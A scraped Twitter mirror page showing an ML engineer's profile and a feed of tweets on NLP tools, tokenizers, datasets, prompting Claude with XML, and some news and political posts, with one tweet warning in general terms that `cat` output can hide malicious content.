Alex Strick van Linschoten (@strickvl) Twitter Tweets • TwiCopy

Alex Strick van Linschoten

@strickvl

+ Follow

Machine Learning Engineer (@zenml_io), researcher (& author of a few books). (Mastodon): @[email protected] (ML) and @[email protected] (Maths)

ID:244511094

linkhttps://mlops.systems calendar_today29-01-2011 13:38:59

1,2K Tweets

1,5K Followers

454 Following

Argilla

2 weeks ago

💥After months of work, we're thrilled to introduce ⚗️distilabel 1.0.0!

🚀More flexible, robust, and powerful.

🙌 Let's empower the community to build the most impactful datasets for Open Source AI!

Blogpost: argilla.io/blog/introduci…
Github: github.com/argilla-io/dis…

thumb_up_off_alt92

chat_bubble_outline0

account_circle

Andy Carnevale

3 weeks ago

Alex Strick van Linschoten Jeremy Howard In my experience, using XML makes a big difference in the quality of output. The cool thing is that you can just make up your own XML tags and Claude will just play along!

docs.anthropic.com/claude/docs/us…

thumb_up_off_alt2

chat_bubble_outline0

account_circle

Jeremy Howard

3 weeks ago

Alex Strick van Linschoten Anthropic encourages you to use XML in prompts -- apparently Claude likes that better.

thumb_up_off_alt29

chat_bubble_outline0

account_circle

Naheed Mustafa

3 weeks ago

The persistence in western media of the view that a person speaking on their own condition is an unreliable narrator of that condition is shameful. This also goes to the heart of the cultural churn in newsrooms here.
(Not a comment on the tweet. Just a related thought).

thumb_up_off_alt8

chat_bubble_outline0

account_circle

The Atlantic

3 weeks ago

AI understands just a tiny fraction of the thousands of languages used worldwide. That means the promised chatbot revolution could shut out billions of people, and even push some languages to extinction, Matteo Wong writes: theatlantic.com/technology/arc…

thumb_up_off_alt54

chat_bubble_outline0

account_circle

Sebastian Ruder

3 weeks ago

Command R+ has strong multilingual capabilities. Its tokenizer also compresses multilingual text much better than other tokenizers. For example, in comparison the OpenAI tokenizer uses:
- 1.18x more tokens for Portuguese
- 1.54x more tokens for Chinese
- 1.67x more tokens for…

Command R+ has strong multilingual capabilities. Its tokenizer also compresses multilingual text much better than other tokenizers. For example, in comparison the OpenAI tokenizer uses: - 1.18x more tokens for Portuguese - 1.54x more tokens for Chinese - 1.67x more tokens for…

thumb_up_off_alt249

chat_bubble_outline0

account_circle

Alex Strick van Linschoten

3 weeks ago

Is it just me or did Apple remove the Colemak keyboard support from iOS devices? Suddenly my device no longer has it… 😱

thumb_up_off_alt0

chat_bubble_outline0

account_circle

Christian Henderson

3 weeks ago

Fellowships for scholars from Gaza

nias.knaw.nl/fellowships/sa…

thumb_up_off_alt149

chat_bubble_outline0

account_circle

tomaarsen

3 weeks ago

Big update for the Massive Text Embedding Benchmark (MTEB) intended to simplify finding a good embedding model! Model filtering, search, memory usage, model size in parameters.
The updated leaderboard: huggingface.co/spaces/mteb/le…
Details in 🧵:

Big update for the Massive Text Embedding Benchmark (MTEB) intended to simplify finding a good embedding model! Model filtering, search, memory usage, model size in parameters. The updated leaderboard: huggingface.co/spaces/mteb/le… Details in 🧵:

thumb_up_off_alt92

chat_bubble_outline0

account_circle

Just Security

3 weeks ago

Talking to “the Enemy” Shouldn’t be Illegal

By Nicholas Noe and Joshua Andresen

#FirstAmendment #OFAC Knight First Amendment Institute Treasury Department #diplomacy

justsecurity.org/94412/talking-…

thumb_up_off_alt37

chat_bubble_outline0

account_circle

Stefano Giomo

4 weeks ago

Zach Mueller Colaboratory Chris Holdgraf 🐘 @[email protected] Just `pip install testcell` ;-)

KAGGLE: kaggle.com/code/artste/in…
COLAB: colab.research.google.com/github/artste/…
GITHUB: github.com/artste/testcell

@TheZachMueller @GoogleColab @choldgraf Just `pip install testcell` ;-) KAGGLE: kaggle.com/code/artste/in… COLAB: colab.research.google.com/github/artste/… GITHUB: github.com/artste/testcell

thumb_up_off_alt8

chat_bubble_outline0

account_circle

Stefano Giomo

4 weeks ago

Zach Mueller Colaboratory Chris Holdgraf 🐘 @[email protected] I developed the 🧪 %%testcell 🧪 cell-magic with a similar need in mind: make it easy to do exploratory programming, try out various experiments without the risk of a single function or variable 'polluting' the global scope.

Launching blog post: artste.github.io/blog/posts/int…

thumb_up_off_alt2

chat_bubble_outline0

account_circle

Jay Alammar

1 month ago

In a lot of other models, Arabic/اللغة العربية (and other non-English languages) are more expensive to use because the tokenizer basically punishes other languages by requiring a lot more tokens to represent their text.

Command R+ improves the tokenization, requiring less tokens…

thumb_up_off_alt102

chat_bubble_outline0

account_circle

Sebastian Ruder

1 month ago

Command R+ (⌘ R+) is our most capable model (with open weights!) yet! I’m particularly excited about its multilingual capabilities. It should do pretty well in 10 languages (English, French, Spanish, Italian, German, Portuguese, Japanese, Korean, Arabic, and Chinese).

You can…

thumb_up_off_alt421

chat_bubble_outline0

account_circle

Pablo Montalvo

1 month ago

It was hard to find quality OCR data... until today! Super excited to announce the release of the 2 largest public OCR datasets ever 📜 📜

OCR is critical for document AI: here, 26M+ pages, 18b text tokens, 6TB! Thanks to UCSF Library, Industry Documents Library and PDF Association
🧶 ↓

It was hard to find quality OCR data... until today! Super excited to announce the release of the 2 largest public OCR datasets ever 📜 📜 OCR is critical for document AI: here, 26M+ pages, 18b text tokens, 6TB! Thanks to @ucsf_library, @industrydocs and @PDFAssociation 🧶 ↓

thumb_up_off_alt625

chat_bubble_outline0

account_circle

Alex Strick van Linschoten

1 month ago

Publishing a new dataset today, this time a unique collection of translations from the 2006-2009 period in Afghanistan. Back then I founded and ran a media monitoring organisation/startup in Kabul, staffed by a small team of amazing translators.
mlops.systems/posts/2024-04-…

thumb_up_off_alt14

chat_bubble_outline0

account_circle

حسام شبات

1 month ago

I have been working nonstop for the past 6 months covering what’s happening in Gaza, but what I saw today while visiting Al-Shifa hospital was unlike anything I’ve ever witnessed before :

Israeli occupation forces executed 300 Palestinians in and around the hospital, and this…

thumb_up_off_alt33,4K

chat_bubble_outline0

account_circle

Devansh (⚡, 🥷)

1 month ago

If you, like many, think relying just on `cat` command's output is enough to be sure about the integrity of a bash file. Think twice, you could get hacked. Read below 👇

If you, like many, think relying just on `cat` command's output is enough to be sure about the integrity of a bash file. Think twice, you could get hacked. Read below 👇

thumb_up_off_alt3,6K

chat_bubble_outline0

account_circle

fpc ok :)